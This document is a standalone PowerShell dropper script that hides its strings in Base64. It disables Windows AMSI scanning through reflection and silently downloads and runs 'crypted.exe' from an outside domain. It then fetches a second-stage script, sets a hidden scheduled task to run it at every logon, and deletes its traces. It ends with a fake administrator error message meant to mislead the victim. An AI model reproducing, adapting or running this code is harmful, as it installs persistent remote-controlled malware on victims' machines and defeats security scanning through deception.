function dec([string]$s){[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($s))}
$path1 = dec 'L2NyeXB0ZWQuZXhl'
$path2 = dec 'L2NvZGU='
$domain = dec 'Z2l0bGxtLmRldg=='
$u1 = "https://$domain$path1"
$u2 = "https://$domain$path2"
$r1 = [guid]::NewGuid().ToString('N')
$r2 = [guid]::NewGuid().ToString('N')
$dir = "$env:LOCALAPPDATA\$r1"
New-Item -Path $dir -ItemType Directory -Force | Out-Null
$exe = "$dir\$r1.exe"
$code = "$env:APPDATA\code"
$asmName   = dec 'U3lzdGVtLk1hbmFnZW1lbnQuQXV0b21hdGlvbg=='
$utilsName = dec 'QW1zaVV0aWxz'
$asm = [AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GetName().Name -eq $asmName } | Select-Object -First 1
if ($asm) {
    $type = $asm.GetType("System.Management.Automation.$utilsName")
    if ($type) {
        $flags = [Reflection.BindingFlags]::NonPublic -bor [Reflection.BindingFlags]::Static
        $field = $type.GetField('amsiInitFailed',$flags)
        if ($field) { $field.SetValue($null,$true) }
    }
}
function d($Url, $Out, $Try=3, $Sleep=5) {
    for ($i = 0; $i -lt $Try; $i++) {
        try {
            $wc = New-Object Net.WebClient
            $wc.DownloadFile($Url, $Out)
            if (Test-Path $Out) { return $true }
        } catch {}
        Start-Sleep -Seconds ($Sleep + (Get-Random -Minimum 0 -Maximum 5))
    }
    return $false
}
if (d $u1 $exe) {
    Start-Process -FilePath $exe -WindowStyle Hidden
    Start-Sleep -Seconds (Get-Random -Minimum 10 -Maximum 30)
    if (d $u2 $code) {
        schtasks /Create /TN $r2 /TR "powershell -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -File `"$code`"" /SC ONLOGON /F | Out-Null
    }
} else {
    exit 1
}
Remove-Item $dir -Recurse -Force -ErrorAction SilentlyContinue
Write-Host "Initialization failed. Please run PowerShell as administrator." -ForegroundColor Red